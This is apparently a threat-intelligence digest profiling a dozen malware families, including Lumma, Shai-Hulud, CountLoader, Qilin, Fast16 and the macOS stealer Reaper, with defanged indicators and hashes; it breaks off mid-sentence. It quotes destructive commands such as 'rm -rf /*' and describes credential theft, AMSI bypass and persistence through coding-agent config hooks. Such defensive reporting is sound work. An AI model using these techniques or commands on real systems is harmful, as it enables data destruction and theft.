Trending Malware

Lumma Stealer is an information-stealing malware family, also referred to as Lumma, LummaC2, and LummaStealer. The provided content identifies it as a commodity infostealer used to harvest browser credentials, session cookies, and cryptocurrency wallet data. It has also been noted as capable of stealing browser passwords and cookies, and reporting on related malware lineage indicates strong focus on browser and wallet theft. The malware appears in multiple delivery ecosystems. Microsoft-linked reporting states that Fox Tempest’s malware-signing-as-a-service operation was used to sign and distribute Lumma Stealer, alongside Oyster, Vidar, and Rhysida, helping malicious binaries appear legitimate and bypass security controls. Fox Tempest was linked to threat actors and ransomware affiliates including Vanilla Tempest, Storm-0501, Storm-2561, and Storm-0249, with downstream victim sectors including healthcare, education, government, and financial services across multiple countries. The content also states that Vanilla Tempest used Fox Tempest-signed malware in campaigns involving fake software delivery. Bitdefender reporting in the content links Lumma Stealer to MSHTA-based infection chains. One prominent cluster involved CountLoader, an HTA-based loader used to deliver Lumma Stealer and Amatera. Observed infection vectors included phishing, fake or cracked software downloads, SEO poisoning, fake social media posts, direct messages, and ClickFix-style fake CAPTCHA or verification prompts. In one chain, victims executed a disguised Setup.exe containing a Python interpreter and a renamed MSHTA binary, which fetched additional payloads from attacker-controlled domains including google-services[.]cc and memory-scanner[.]cc; later infrastructure included explorer[.]vg and ccleaner[.]gl. Another chain used Discord phishing and clipboard-based social engineering to launch mshta.exe and ultimately deliver Lumma Stealer fully in memory. The content attributes several defense-evasion and browser-theft capabilities to Lumma Stealer or closely related activity. It states that Lumma Stealer attempted to bypass Windows AMSI by removing the string "AmsiScanBuffer" from clr.dll in memory to prevent it from being called. It is also explicitly named among infostealers that continued harvesting Chrome cookie data and other secrets after Google introduced App-Bound Encryption (ABE). Separate reporting in the content on Remus describes Lumma as using shellcode injection into a live browser process to recover and decrypt Chromium master keys from memory, and characterizes Lumma as one of the most technically advanced stealers-as-a-service in recent history. The content also links Lumma Stealer to broader malware clustering and detection artifacts. Crowdsourced YARA labels in one related campaign included Lumma, and a NuGet supply-chain investigation found a unique RSA key in malicious packages that also appeared in VirusTotal files labeled as related to Lumma, Quantum, AgentRacoon, and ArrowRAT. High-confidence indicators directly associated in the content with Lumma delivery ecosystems include domains such as google-services[.]cc, memory-scanner[.]cc, explorer[.]vg, and ccleaner[.]gl in CountLoader/MSHTA chains, as well as the Fox Tempest signing infrastructure signspace[.]cloud used to sign and distribute Lumma Stealer.

Shai-Hulud is a self-replicating supply-chain malware worm targeting the open-source software ecosystem, especially npm and PyPI packages and developer/CI environments. First reported in September 2025 and heavily active through 2026, it is consistently linked in the provided reporting to TeamPCP. Its core purpose is credential theft and automated propagation: it steals secrets such as GitHub tokens, npm tokens, API keys, AWS credentials, Kubernetes service account tokens, HashiCorp Vault tokens, SSH keys, cloud credentials, cryptocurrency wallet data, and other sensitive material from infected machines, then uses compromised maintainer or workflow credentials to publish trojanized package updates and spread further. Across the reporting, Shai-Hulud is described as infecting developer workstations and CI/CD pipelines through poisoned packages and install-time hooks, including npm preinstall/postinstall execution, Python import-time triggers, and malicious IDE or coding-agent persistence. Observed tradecraft includes downloading and using the Bun runtime to execute payloads; harvesting secrets from local files, environment variables, GitHub CLI data, AWS metadata endpoints, Kubernetes tokens, and GitHub Actions runner memory; abusing GitHub Actions OIDC trusted publishing to obtain npm publish access; and using stolen GitHub tokens to create public repositories or commits as fallback exfiltration channels. Multiple reports also describe persistence via VS Code tasks, Claude Code configuration hooks, Python .pth hooks, systemd user services, macOS LaunchAgents, Windows Startup entries, and token-monitor components. The malware has been associated with large-scale compromises of npm and PyPI packages, including campaigns affecting TanStack packages and incidents discussed in connection with Grafana, SAP developer packages, OpenSearch-related artifacts, Mistral AI-related packages, and other open-source ecosystems. Reporting states that TeamPCP publicly released or leaked Shai-Hulud source code on GitHub in May 2026, after which copycat variants rapidly appeared in npm packages such as chalk-tempalte and other typosquatted packages. These clones retained the original model of stealing credentials and exfiltrating them to attacker-controlled infrastructure or GitHub repositories. High-confidence indicators and artifacts directly mentioned in the content include campaign infrastructure such as git-tanstack.com and the /router path, t.m-kosche[.]com:443, 87e0bbc636999b[.]lhr[.]life, edcf8b03c84634[.]lhr[.]life, 80[.]200[.]28[.]28:2222, seed1.getsession.org, seed2.getsession.org, seed3.getsession.org, and api.masscan.cloud; package/file artifacts such as setup.mjs, ai_init.js, DEADMAN_SWITCH.sh, router_init.js, opensearch_init.js, gh-token-monitor.sh, gh-token-monitor.service, com.user.gh-token-monitor.plist, and pgmonitor.py; and compromise markers including public repositories described as "A Mini Sha1-Hulud has Appeared" or "Shai-Hulud: Here We Go Again," the string "thebeautifulmarchoftime," and the extortion-style message "IfYouRevokeThisTokenItWillWipeTheComputerOfTheOwner." Several reports also note a Russian-locale exclusion/kill switch and encrypted exfiltration using gzip plus AES-256-GCM with RSA wrapping.

Mini Shai-Hulud is a self-propagating supply-chain worm and credential-stealing malware campaign attributed in the provided reporting to TeamPCP (also tracked as UNC6780 in some reporting). It targets developer workstations, CI/CD runners, and cloud-connected build environments by compromising legitimate npm and PyPI packages and abusing trusted release pipelines. Reported affected ecosystems and projects include TanStack, Mistral AI, UiPath, OpenSearch, Guardrails AI, durabletask, and packages in the @antv ecosystem. The malware has also been linked in reporting to compromises involving poisoned Visual Studio Code extensions on developer devices. Its core behavior is credential theft and automated propagation. The malware is described as stealing CI/CD credentials, GitHub and npm/PyPI publishing tokens, GitHub Actions OIDC tokens, cloud access keys, SSH keys, Kubernetes secrets, HashiCorp Vault secrets, password-manager data, local credential files, shell histories, environment variables, database connection strings, and developer/AI tooling configuration data. Multiple reports state it can enumerate packages accessible to a stolen maintainer token and republish trojanized versions under legitimate accounts, allowing one infected developer machine or CI runner to spread the worm to additional packages. In some waves it abused GitHub Actions cache poisoning, pull_request_target workflow abuse, and runtime extraction of OIDC tokens from runner memory to publish malicious packages with valid SLSA Build Level 3 or Sigstore provenance. Execution and payload delivery varied by wave. Reported package-side artifacts include obfuscated JavaScript such as router_init.js, preinstall hooks invoking Bun, and Python import-time droppers. In the durabletask compromise, malicious versions 1.4.1, 1.4.2, and 1.4.3 executed on import on Linux, downloading rope.pyz from check.git-service[.]com to /tmp/managed.pyz and launching it with python3. Reported infrastructure and exfiltration endpoints associated with Mini Shai-Hulud include check.git-service[.]com, t.m-kosche[.]com, git-tanstack[.]com, filev2.getsession[.]org, api.masscan[.]cloud, and 83.142.209[.]194. The rope.pyz payload hash reported in the content is 069ac1dc7f7649b76bc72a11ac700f373804bfd81dab7e561157b703999f44ce. The malware is reported to establish persistence on infected systems and survive package removal. Observed persistence mechanisms include backdoors in .vscode/tasks.json and .claude/settings.json, Linux systemd services such as gh-token-monitor.service and pgsql-monitor.service, and macOS LaunchAgents. Reported auxiliary components include kitty-monitor and gh-token-monitor, with the latter checking stolen GitHub tokens at short intervals and in some reporting acting as a dead-man’s switch. Some variants also injected malicious GitHub Actions workflows into repositories to exfiltrate secrets. Exfiltration is described as multi-path and resilient. Stolen data was reported as being serialized, compressed, encrypted with AES-256-GCM, and wrapped with RSA-OAEP before transmission. Besides direct C2 upload, fallback exfiltration reportedly used stolen GitHub tokens to create public repositories under victim accounts, often with Russian folklore-themed names such as BABA-YAGA, KOSCHEI, FIREBIRD, VASSILISA, and RUSALKA, or repositories containing the marker "Shai-Hulud: Here We Go Again." Some reporting also describes a FIRESCALE dead-drop mechanism using GitHub commit search to discover alternate C2 endpoints. The malware is primarily described as Linux-focused in its Python second-stage components and includes anti-analysis or targeting logic. Reported checks include exiting on non-Linux systems, Russian locale settings, and low CPU-count environments. Several reports describe destructive behavior: a dead-man’s-switch routine that can execute "rm -rf ~/" if a stolen token is revoked, and a geofenced wiper branch that on some Israeli- or Iranian-profiled hosts has a 1-in-6 chance of executing "rm -rf /*" or otherwise deleting accessible files, sometimes after downloading and playing audio from attacker infrastructure. High-confidence indicators and artifacts directly mentioned in the content include malicious file names router_init.js, setup.mjs, rope.pyz, and /tmp/managed.pyz; persistence artifacts such as ~/.config/systemd/user/gh-token-monitor.service, pgsql-monitor.service, ~/Library/LaunchAgents/com.user.gh-token-monitor.plist, .vscode/tasks.json, and .claude/settings.json; and the ransom-style token description "IfYouRevokeThisTokenItWillWipeTheComputerOfTheOwner." The reporting consistently characterizes Mini Shai-Hulud as an active, expanding supply-chain malware family that should lead defenders to treat any system that installed affected package versions as fully compromised.

Oyster, most commonly referred to as OysterLoader and also known as Broomstick, CleanUp, and CleanUpLoader, is a C++ multi-stage loader/backdoor used to establish initial access, maintain persistence, communicate with command-and-control infrastructure, collect host information, and deliver additional payloads. Reporting in the provided content links it primarily to campaigns associated with the Rhysida ransomware group, including activity by Vanilla Tempest, and also to delivery of commodity malware such as Vidar. It has been observed in malvertising, SEO-poisoning, and fake software download campaigns that impersonate legitimate software such as Microsoft Teams, PuTTY, WinSCP, Zoom, Google Authenticator, AnyDesk, Cisco Webex, and AI software. Delivery methods described include signed MSI installers, deceptive downloaders such as MSTeamsSetup_c_l_.exe, trojanized Microsoft Teams installers, compromised websites, fake ads, and DLL sideloading via a signed CapCut executable. The malware is described as a modular, multistage implant/loader with four stages in several reports: a TextShell packer/obfuscator, custom shellcode using a bespoke or modified LZMA decompression routine, an intermediate downloader that performs environment checks and initiates C2, and a final core DLL payload. Anti-analysis and evasion features directly mentioned include API hammering or flooding, anti-debugging via IsDebuggerPresent, dynamic API resolution using custom hashing, custom or modified LZMA routines, obfuscated embedded C2 domains, spoofed headers and deceptive user-agent strings, steganographic payload delivery in icon or PNG content, RC4 decryption of hidden payloads, and custom Base64-like encoding with non-standard alphabets and per-message shifts. Persistence mechanisms mentioned include scheduled tasks such as ClearMngs or tasks running every 13 minutes, dropped DLLs including COPYING3.dll and CleanUp30.dll, and execution via rundll32.exe. Host reconnaissance described in the content includes collection of computer name, username, domain, OS version, local IP address, privilege level, DLL version, and running process information. C2 behavior in the content includes earlier use of endpoints such as /reg and /login, /api/connect and /api/session, and later evolution to /api/v2/init, /api/v2/facade, and dynamically assigned beacon paths. Reported user-agent strings include WordPressAgent and FingerPrint. High-confidence infrastructure and artifacts directly mentioned include domains supfoundrysettlers[.]us, whereverhomebe[.]com, retdirectyourman[.]eu, grandideapay[.]com, nucleusgate[.]com, cardlowestgroup[.]com, socialcloudguru[.]com, coretether[.]com, and registrywave[.]com; IPs 85.239.53[.]66, 51.222.96[.]108, and 135.125.241[.]45; mutexes h6p#dx!&fse?%AS! and ITrkfSaV-4c7KwdfnC-Ds165XU4C-lH6R9pk1; filenames MSTeamsSetup_c_l_.exe, CleanUp30.dll, and COPYING3.dll; and the scheduled task name ClearMngs. The content also ties Oyster/OysterLoader to abuse of fraudulent Microsoft Artifact Signing/Trusted Signing certificates through the Fox Tempest malware-signing-as-a-service operation, which helped signed Oyster samples appear legitimate and bypass security controls. Downstream attacks linked to this ecosystem targeted healthcare, education, government, and financial services organizations globally.

Vidar is an information-stealing malware family, also referred to as Vidar Stealer or Vidar infostealer, active since late 2018 and described as a descendant or fork of Arkei. It targets Windows systems and is used to steal browser-stored credentials, cookies, autofill data, session tokens, cryptocurrency wallet data, system information, screenshots, email client data, local files, and in newer reporting Azure tokens, FTP/SSH credentials, Telegram and Discord artifacts. Multiple reports describe Vidar using dead-drop resolver techniques via public services such as Telegram and Steam profiles to retrieve command-and-control information dynamically, and some samples communicate over HTTPS using multipart POST requests containing host identifiers. Reported anti-analysis and evasion features include debugger and sandbox checks, antivirus/security process checks, dynamic API resolution, process injection, browser decryption via CryptUnprotectData and BCrypt, and in some campaigns memory-resident or fileless execution. Observed delivery vectors in the provided content include spear-phishing emails with ZIP attachments containing malicious shortcut files, ClickFix social engineering that tricks users into running PowerShell commands from fake CAPTCHA or browser verification prompts, fake software installers, fake OpenClaw installers, trojanized MicrosoftToolkit software, fake GitHub repositories, Reddit and Discord lures, compromised WordPress sites, YouTube social engineering, Trojanized npm packages, and fake game-cheat downloads including Counter-Strike 2 cheat lures. One campaign hid payload data in JPEG and TXT files using steganography; another used native Windows tools such as curl.exe, WScript, and PowerShell, Python Embed packages, scheduled tasks, and AutoIt loaders. Reporting also describes Vidar 2.0 as a major evolution with a rewrite from C++ to C, polymorphic builds, multithreading, broader data theft, and continued use of Telegram and Steam dead-drop resolvers. The malware is associated in the content with broad cybercriminal use and malware-as-a-service activity, and has been linked to campaigns or ecosystems involving Vanilla Tempest, Scattered Spider, and the Fox Tempest malware-signing-as-a-service operation. Microsoft reporting cited Vidar among malware families signed and distributed through Fox Tempest’s abuse of Microsoft Artifact Signing, alongside Oyster, Lumma Stealer, and Rhysida ransomware, affecting sectors including healthcare, education, government, and financial services globally. The content also states Vidar rose to prominence in the infostealer market after disruptions to Lumma and Rhadamanthys. High-confidence indicators mentioned in the content include Telegram dead-drop URLs such as telegram[.]me/hgo9tx, telegram[.]me/bul33bt, telegram[.]me/cego54, telegram[.]me/ahnadar, and t.me/b8bz11; Steam profile dead-drops including steamcommunity[.]com/profiles/76561198707628078, 76561198765046918, 76561198761022496, and 76561198780411257; active or related infrastructure including 135.181.237.59:443, gz[.]technicalprorj[.]xyz, kmot.co[.]kr, haeundaejugong[.]com, printory[.]kr, udcontest[.]com, ableinfo.co[.]kr, 114.207.246[.]156, and 149.154.167.99; and sample hashes including SHA256 2995ffb73342453b258926ec865c724e3567eee1bb8eb35d61796ee0c4f25105, fc27479ff929d846e7c5c5d147479c81e483a2ec911bd1501a53aa646a29620d, and 881619a47b62b52305d92640cc4d4845a279c23a5a749413785fc8fcb0fdf7fb.

Rhysida is a ransomware family and associated ransomware-as-a-service operation first identified in May 2023. The malware is described as capable of both encrypting files and stealing data, enabling double-extortion attacks in which victims are pressured to pay for a decryption key and to prevent publication of stolen data. Reporting in the provided content links Rhysida activity to multiple actors, including Vanilla Tempest, and notes that Vice Society has delivered Rhysida in some attacks. Microsoft observed Fox Tempest, a malware-signing-as-a-service operation, enabling deployment of Rhysida by actors such as Vanilla Tempest through fraudulently obtained Microsoft-issued code-signing certificates. Rhysida has been associated with opportunistic intrusion methods and with campaigns targeting healthcare, education, government, and manufacturing; governments and other critical organizations worldwide are also referenced. The content cites high-profile incidents including attacks affecting the British Library, Seattle-Tacoma International Airport, and a claimed 2025 breach of Heart South Cardiovascular Group. Related delivery infrastructure includes Oyster/OysterLoader, also known as Broomstick or CleanUp, a multi-stage C++ loader used in campaigns linked to Rhysida that has been distributed via malvertising, SEO poisoning, and trojanized installers impersonating software such as Microsoft Teams, PuTTY, WinSCP, Google Authenticator, and Google Chrome. In observed chains, fake Teams installers signed through Fox Tempest deployed Oyster and in some cases Rhysida. Detection-oriented content also associates Rhysida with behaviors such as wallpaper changes, setting the ActiveDesktop NoChangingWallPaper registry value to enforce a malicious wallpaper, disabling logs with wevtutil, high process termination frequency, ransom note creation, PowerShell-based discovery and defense evasion, ACL tampering, service stopping, and process killing. High-confidence indicators directly mentioned in the content are primarily tied to Rhysida-linked delivery activity via OysterLoader, including domains such as grandideapay[.]com, nucleusgate[.]com, cardlowestgroup[.]com, socialcloudguru[.]com, coretether[.]com, registrywave[.]com, and the Fox Tempest signing platform signspace[.]cloud.

rope.pyz is a Linux-focused Python zipapp malware payload and modular cloud intrusion framework delivered in the malicious PyPI durabletask releases 1.4.1, 1.4.2, and 1.4.3. It is described as a direct evolution of transformers.pyz from the earlier guardrails-ai compromise and is linked in the reporting to TeamPCP’s broader Mini Shai-Hulud software supply-chain campaign. The durabletask package executed malicious code on import, downloading rope.pyz from attacker-controlled infrastructure including check.git-service[.]com/rope.pyz and launching it as /tmp/managed.pyz; reporting also identifies t.m-kosche[.]com as secondary infrastructure and 83.142.209.194 as a legacy campaign IP. The payload is reported as a Python zipapp containing 17 source files or 19 modules/files, with SHA-256 069ac1dc7f7649b76bc72a11ac700f373804bfd81dab7e561157b703999f44ce. High-confidence reported capabilities include credential and secret theft from AWS, Azure, GCP, Kubernetes, HashiCorp Vault, local filesystems, shell history, environment variables, Docker environments, and password managers including Bitwarden, 1Password, pass, gopass, and GPG-based stores. It enumerates AWS Secrets Manager and SSM Parameter Store data, Azure subscriptions and Key Vault secrets, GCP Secret Manager data, Kubernetes secrets across namespaces and contexts, and Vault KV secrets. It also targets numerous local credential and configuration paths and shell history files such as .bash_history and .zsh_history. rope.pyz includes anti-analysis and targeting logic that exits on non-Linux systems, Russian locale settings, and low-CPU environments. It can install the cryptography dependency at runtime if needed. Reported exfiltration uses encrypted packaging of stolen data with gzip, AES-256-GCM, and RSA-OAEP with a hardcoded RSA-4096 public key, sending data primarily to https://check.git-service[.]com/api/public/version. Reporting also states it can use stolen GitHub tokens to create public repositories with Russian folklore-themed names for fallback exfiltration, and can use a FIRESCALE GitHub dead-drop mechanism for fallback command-and-control. Additional reported endpoints include /v1/models as a command or killswitch endpoint and /audio.mp3 in connection with destructive behavior. The malware supports lateral movement and propagation via AWS SSM and Kubernetes kubectl exec, with reporting stating it limits propagation to up to five targets per infected host or per mechanism. Infection and propagation markers include ~/.cache/.sys-update-check and ~/.cache/.sys-update-check-k8s, and downloaded runtime artifacts include /tmp/managed.pyz and /tmp/rope-*.pyz. Persistence has been reported via a fake systemd service named pgsql-monitor.service. Some reporting states rope.pyz contains a geographically targeted destructive component associated with Israel- and Iran-related locale or timezone indicators that may play audio from the C2 and execute rm -rf /* probabilistically. Targeted environments described in the reporting include Linux cloud workloads, CI/CD runners, Kubernetes environments, developer infrastructure, and official Microsoft durabletask users exposed through the poisoned PyPI releases.

GraphWorm is a backdoor used by the China-aligned APT group Webworm, also tracked as Space Pirates and UAT-8302. It was reported by ESET as part of Webworm’s 2025 tooling expansion and is used in campaigns targeting government organizations in Europe, including Belgium, Italy, Poland, Serbia, and Spain, as well as activity involving a university in South Africa. GraphWorm uses Microsoft Graph API and Microsoft OneDrive for command-and-control, retrieving tasks and uploading victim information through cloud endpoints to blend with legitimate traffic. High-confidence reported capabilities include persistence via execution at user logon through Windows Registry Run key modification; generation of a unique victim ID derived from the network adapter IP, processor ID, and a physical device serial number obtained via WMI; creation of a dedicated OneDrive folder per victim with subfolders such as /files, /result, and /job for staging, tasking, and results; file upload and download; spawning cmd.exe or executing newly created processes; configurable sleep intervals; and stopping its own execution on operator signal. Reported implementation details include encryption of data with AES-256-CBC and base64 encoding, and use of the Microsoft Graph API /createUploadSession endpoint to upload large staged files to OneDrive. One report also states GraphWorm is written in Go and is internally referred to as OverOneDrive. The initial access and delivery mechanism for GraphWorm are currently unknown based on the provided content.

CountLoader is a multi-stage malware loader and malware-as-a-service platform active in the wild since at least June 2025. It is repeatedly described as an HTA/MSHTA-based loader used to deliver follow-on payloads including LummaStealer, Amatera, ACR Stealer, Cobalt Strike, AdaptixC2, PureHVNC RAT, PureMiner, and in some reporting ransomware-enablement tooling. Multiple reports link it to Russian-speaking cybercrime activity and ransomware ecosystems associated with LockBit, BlackBasta, and Qilin; Silent Push assesses it is likely used by initial access brokers or ransomware affiliates. Breakglass Intelligence assesses it as a Russian-speaking cybercrime or MaaS operation with strong infrastructure management, and one report notes Russian-language artifacts in the USB-spreading code. Observed infection vectors include phishing, fake software downloads, cracked software sites, SEO poisoning, fake social media posts, direct messages, CHM-triggered remote HTA execution, and HTML Application files disguised with benign extensions such as .wav, .xml, .mp4, .ini, .csv, and .rar. In one Bitdefender-observed chain, victims downloaded archives posing as setup utilities; the embedded Setup.exe was actually a legitimate Python interpreter bundled with malicious scripts and a renamed MSHTA binary (iso2022.exe) used to retrieve the next stage from attacker-controlled domains. Fortinet also documented a Ukrainian police-themed phishing campaign in which a malicious SVG led to a password-protected archive containing a CHM file that launched a remote HTA CountLoader stage. Core behavior across reporting shows CountLoader using mshta.exe to execute HTA content, layered obfuscation, anti-sandbox checks, host profiling, persistence, and flexible tasking. Anti-analysis checks include terminating or altering behavior for hostnames such as AZURE-PC, username Bruno, and certain SYSTEM/СИСТЕМА locale values; some samples also check for CrowdStrike Falcon and change execution flow to evade direct mshta.exe child-process detections. Persistence mechanisms include scheduled tasks running every 30 minutes for long durations, HKCU Run keys, and HTA relaunch. Reported scheduled task names include CCleanerTaskID, NVIDIA App SelfUpdate_{MD5_hash}, and Google-mimicking tasks. CountLoader supports multiple download and execution methods using PowerShell, curl.exe, bitsadmin, certutil, msiexec, and VBScript/XMLHTTP, and can execute EXEs, DLLs via rundll32, MSI packages, ZIP/Python chains, arbitrary HTA, and PowerShell payloads. A distinguishing capability is extensive cryptocurrency targeting. Breakglass and McAfee reporting state that CountLoader targets more than 50, and later 76, cryptocurrency wallet browser extensions across more than 40 browsers, plus desktop wallet applications including Ledger Live, Trezor, Exodus, Atomic Wallet, Guarda, KeepKey, and BitBox02. It also targets data from 66 Chromium-based browsers. McAfee documented a CountLoader campaign delivering a cryptocurrency clipper that intercepts clipboard wallet addresses and replaces them with attacker-controlled addresses. The same campaign used shellcode injection, AMSI bypass, in-memory execution under systeminfo.exe, and EtherHiding to retrieve final C2 information from the Ethereum blockchain. Another notable capability is enterprise reconnaissance. Breakglass Intelligence documented a dedicated Active Directory reconnaissance module that collects local system information, domain role, current user SID, group memberships, domain controller connectivity, Domain Admin membership, domain identifiers, all domain computers, and all domain groups using WMI and ADSI queries. This combination of wallet theft and AD reconnaissance means a single infection on a domain-joined host can support both immediate financial theft and later lateral movement or broader compromise. CountLoader also supports USB propagation. Multiple reports state it spreads through removable media by hiding original files and replacing them with malicious .lnk shortcuts that execute the malware, often while opening the original file to reduce suspicion. McAfee attributed roughly 9,000 infections in one campaign to the USB-spread mechanism. Infrastructure associated with CountLoader includes domains masquerading as legitimate services and software brands. High-confidence examples directly mentioned in the content include google-services[.]cc, memory-scanner[.]cc, explorer[.]vg, ccleaner[.]gl, microservice[.]gl, web3-walletnotify[.]cc, communicationfirewall-security[.]cc, burning-edge[.]sbs, favourite-guide[.]cc, indeanapolice[.]cc, s1-rarlab[.]com, magnusworkspace[.]com, s3-python[.]cc, node1-py-store[.]com, and node2-py-store[.]com. Reported IPs include 192.109.200.130, 82.29.72.214, 65.21.174.205, 45.43.137.82, 194.102.104.221, 178.255.222.234, and 85.121.148.80. Specific sample hashes directly tied to CountLoader in the content include 4ee17ce2e1ce0ede59dceabbba28265923ce4e25ddb002617e3cc8f13cfff6a3 for a trojanized CCleaner installer, 5f9ff671955a6d551595f9838aed063c496da5039be0d222fe84f96cb3e1d32a for a Stage 1 EXE in McAfee’s campaign, e27ff6646a2f98b81ea5da4d0d93127f0f3e68a5e6728f404724e388376ede84 for Summer_Data_Primary_44.rar, and the recurring CLSID {0830A3F8-70B8-40E1-A0F3-E0EC9092F861}. Breakglass also extracted CountLoader version string v4.1.1 and documented custom XOR-plus-base64 C2 communications with JWT-authenticated bot management.

Qilin, also known as Agenda and AgendaCrypt, is a Russian-speaking ransomware-as-a-service (RaaS) operation first observed in July 2022 under the name Agenda and rebranded as Qilin in September 2022. It operates a double-extortion model with file encryption and data theft, uses a Tor negotiation portal and leak blog, and reportedly excludes CIS countries from targeting while paying affiliates 80% to 85% of collected ransoms. The operation became one of the most prominent ransomware brands in 2025-2026, with reporting stating it was the most prolific ransomware brand by data leak site volume in 2025 and the leading operation for the third consecutive quarter in Q1 2026 with 338 posted victims. After RansomHub went quiet, reporting indicates Akira and Qilin absorbed part of its market share. The malware supports cross-platform targeting. Content describes Windows and Linux/ESXi-focused capabilities, including use against virtualization infrastructure and backup or identity systems as part of recovery-denial tactics. A recovered Rust-based Qilin sample was described as a statically linked x86 PE32 executable compiled on 2026-03-17. Its encryption uses either AES-256 or ChaCha20 selected per file, with intermittent encryption based on file size. Encrypted files receive a 550-byte footer containing a 512-byte RSA-OAEP-wrapped symmetric key, an 8-byte length field, and the ASCII marker "-----END CIPHERTEXT BLOCK-----". The sample embedded additional tooling in .rdata, including a VMware vCenter PowerShell spreader that installs PowerCLI, connects to vCenter, enumerates ESXi hosts, uploads the Linux Qilin encryptor, and launches it on each host, as well as signed Sysinternals PsExec binaries and wallpaper images. Qilin has notable defense-evasion and security-tool disabling functionality. Reporting states it can terminate antivirus-related processes and services. It has been observed using a three-driver EDR-killing chain involving signed vulnerable drivers RwDrv.sys and ControlCenter.sys plus a custom unsigned driver hlpdrv.sys that strips file ACLs and terminates processes by PID. Separate reporting states Qilin operators added the vulnerable signed Windows kernel driver TPwSav.sys to their toolkit for BYOVD attacks. Qilin can also abuse legitimate remote management software: specifically, it can use Splashtop's SRManager.exe to execute the Linux ransomware binary directly on Windows systems. The operation is associated with multiple threat actors and affiliate ecosystems. Microsoft reporting tied Fox Tempest-linked ransomware affiliates to Qilin, and Microsoft stated Octo Tempest, also known as Scattered Spider, was a Qilin affiliate. Other reporting states The Gentlemen's founder was a former Qilin affiliate. Rapid7 reporting linked MuddyWater and Iran's MOIS to the Qilin ecosystem, including use of Qilin in attacks against Israeli organizations. Victimology in the provided content includes critical infrastructure and healthcare. Qilin is explicitly described as targeting critical infrastructure sectors and healthcare organizations, including hospitals and clinical service providers, using both data exfiltration and encryption. High-profile incidents in the content include the June 2024 attack on Synnovis, an NHS vendor, which disrupted NHS blood testing and was reported to have caused cancellation of roughly 1,100 surgeries and 2,000 outpatient appointments. Additional reporting states long-term disruption persisted into 2026 at South London and Maudsley NHS Foundation Trust, with pathology systems not fully restored, 161,560 pathology reports delayed in entry to patient records, and prior reporting referenced more than 10,000 impacted appointments, leaked sensitive medical data, and 170 harmed patients. The content also references Qilin claims involving Rocky Mountain Care, Asahi Group Holdings, Nissan Creative Box, Lee Enterprises, and Malaysia Airports, with one report stating Qilin demanded $10 million from Malaysia Airports and claimed to hold 2 TB of its data. Notable indicators and artifacts directly mentioned in the content include aliases Agenda and AgendaCrypt; the clearweb leak domain wikileaks2.site referenced in a ransom note; an alternate leak URL using https://31.41.244.100 in a separate DLL campaign; company IDs QEz6CWqBK1 and 0c-IyC4m1G in analyzed samples; the ASCII footer marker "-----END CIPHERTEXT BLOCK-----"; and drivers RwDrv.sys, ControlCenter.sys, hlpdrv.sys, and TPwSav.sys. The content also notes one analyzed EXE sample accepted any non-empty password at runtime because a SHA-256 password comparison was bypassed by an unconditional jump.

Fast16 is a cyber sabotage framework and malware platform whose known core components date to approximately 2005, predating the public discovery of Stuxnet by about five years. Public reporting describes it as a Lua-based, modular Windows malware framework centered on the carrier svcmgmt.exe and the boot-start filesystem driver fast16.sys. The service binary embeds an early Lua 5.0 virtual machine and encrypted Lua payloads, while the driver intercepts filesystem reads and patches executable code in memory using a rule-driven hook engine with 101 byte-pattern rules. The malware was designed to tamper with high-precision engineering and physics simulation software rather than conduct conventional espionage. High-confidence reporting identifies LS-DYNA and AUTODYN as targeted applications, and other analyses indicate likely overlap with LS-DYNA 970, PKPM, and the MOHID hydrodynamic modeling platform. Its sabotage logic selectively alters floating-point and simulation outputs under narrow conditions, including high-explosive and detonation modeling scenarios. Multiple reports state that it was intended to corrupt simulation results in a subtle, predictable, and reproducible way, including by reducing pressure- or stress-related values once simulated material density reached about 30 g/cm³. Researchers assessed this behavior as consistent with interference in nuclear weapons-related implosion simulations and high-explosive detonation modeling. Fast16 also includes worm-like lateral movement. Reporting states that svcmgmt.exe can deploy wormlets that propagate across Windows 2000 and Windows XP systems via Windows service-control and file-sharing APIs, copying itself to remote administrative shares and creating remote services. The malware checks for the presence of certain security products in the registry and may refuse to spread or install when those products are detected. Additional reported behaviors include boot-time persistence through the kernel driver, targeting of Intel-compiled executables, and modification of code as files are read from disk rather than simply replacing binaries on disk. Researchers from SentinelOne publicly disclosed and analyzed Fast16 in April 2026, and later analysis by Symantec and Carbon Black concluded that it was explicitly designed to tamper with LS-DYNA and AUTODYN simulations involving high explosives, with evidence strongly suggesting a focus on nuclear detonation modeling. The content links the name fast16 to material leaked by the Shadow Brokers in 2017, but attribution remains unconfirmed in the reporting. High-confidence indicators directly mentioned in the content include the filenames svcmgmt.exe and fast16.sys; reported hashes include svcmgmt.exe SHA256 9a10e1faa86a5d39417cae44da5adf38824dfb9a16432e34df766aa1dc9e3525 and fast16.sys SHA256 07c69fc33271cf5a2ce03ac1fed7a3b16357aec093c5bf9ef61fbfa4348d0529.

Reaper is a macOS infostealer tracked as a variant of the SHub malware family. SentinelOne reported that it impersonates trusted brands including Apple, Microsoft, and Google during infection and persistence stages. The campaign uses fake WeChat and Miro installer pages hosted on typo-squatted infrastructure including mlcrosoft[.]co[.]com, with hidden JavaScript used to profile victims. Multiple reports state the malware avoids infecting likely Russia/CIS-region systems by checking locale or input-source indicators and exiting if matched. Execution is delivered through macOS Script Editor via the applescript:// URL scheme, with a malicious AppleScript pre-populated and visually hidden using padding, ASCII art, or fake installer text. This approach was reported as a departure from earlier SHub ClickFix-style delivery and as a way to bypass Apple Tahoe 26.4 mitigations aimed at Terminal-based flows. After the user runs the script, Reaper retrieves additional AppleScript or shell content, may display a fake XProtectRemediator or security-update prompt, and prompts for the user’s macOS login password to facilitate credential theft and decryption of stored data. Reaper steals browser data and credentials, password manager data, cryptocurrency wallet data, developer-related files, macOS Keychain data, iCloud account information, Telegram session data, and documents from Desktop and Documents. Reported targets include browser extensions and applications associated with 1Password, Bitwarden, LastPass, MetaMask, Phantom, Exodus, Atomic Wallet, Ledger Wallet, Ledger Live, and Trezor Suite. The malware includes a file-grabber component described as similar to functionality seen in Atomic macOS Stealer (AMOS). Reported file targets include extensions such as .docx, .wallet, .key, .json, and .rdp, with stolen data staged under /tmp/shub_<random>/ and in some reporting split into chunks before exfiltration. One report specifically identified uploads to hebsbsbzjsjshduxbs[.]xyz via /gate/chunk. Beyond theft, Reaper can tamper with desktop cryptocurrency wallet applications by downloading a modified app.asar from command-and-control, terminating the wallet process, and replacing the legitimate file to enable continued theft or monitoring. For persistence, Reaper creates files under a fake Google Software Update path at ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate and registers a LaunchAgent at 